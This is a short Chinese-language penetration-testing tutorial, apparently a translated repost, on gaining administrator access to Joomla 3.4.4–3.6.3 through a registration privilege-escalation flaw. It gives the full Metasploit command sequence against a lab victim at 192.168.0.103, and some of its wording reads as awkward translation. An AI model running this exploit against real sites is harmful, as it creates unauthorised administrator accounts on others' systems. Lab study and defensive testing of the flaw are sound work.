Joomla CMS 3.X漏洞实战渗透测试教程:利用Joomla的越权漏洞来破解Joomla CMS

在本文中,我们将学习如何破解Joomla CMS。为此我们将成为metasploit的预先安排的模块,它将进一步帮助我们在Joomla版本3.4.4到3.6.3中创建具有管理权限的专制帐户。因此,如果在Joomla中安排了电子邮件服务器,则会发送一封电子邮件来激活该帐户(默认情况下该帐户处于禁用状态)。
利用目标
Joomla 3.4.4至3.6.3
需求
攻击者:kali Linux
受害者PC:Joomla 3.4.4
Joomla CMS 3.X漏洞实战渗透测试教程:利用Joomla的越权漏洞来破解Joomla CMS
在Kali中打开终端并键入  msfconsole以启动metasploit。
Joomla CMS 3.X漏洞实战渗透测试教程:利用Joomla的越权漏洞来破解Joomla CMS
打开metasploit后,键入以下命令以执行攻击:
use auxiliary/admin/http/joomla_registration_privsec
msf exploit (joomla_registration_privsec)>set rhost 192.168.0.103
msf exploit (joomla_registration_privsec)>set username raj
msf exploit (joomla_registration_privsec)>set password raj123
msf exploit (joomla_registration_privsec)>set email raj@hackingarticles.in
msf exploit (joomla_registration_privsec)>set targeturi /joomla
msf exploit (joomla_registration_privsec)>exploit
Joomla CMS 3.X漏洞实战渗透测试教程:利用Joomla的越权漏洞来破解Joomla CMS
执行此攻击将允许您创建一个理想的用户名和密码,就像在这种情况下我给了用户名:raj密码:raj123以及电子邮件ID:raj@hackingarticles.in
在下图中,您可以看到将通过您提供的用户名和密码创建新用户。
Joomla CMS 3.X漏洞实战渗透测试教程:利用Joomla的越权漏洞来破解Joomla CMS
当您创建了用户名时,您可以使用上述用户名登录。
Joomla CMS 3.X漏洞实战渗透测试教程:利用Joomla的越权漏洞来破解Joomla CMS
现在,您可以用最简单的方式破解Joomla CMS。
转载请注明本文链接: http://www.mayidui.net/t2311.html
游客
登录后才可以回帖,登录 或者 注册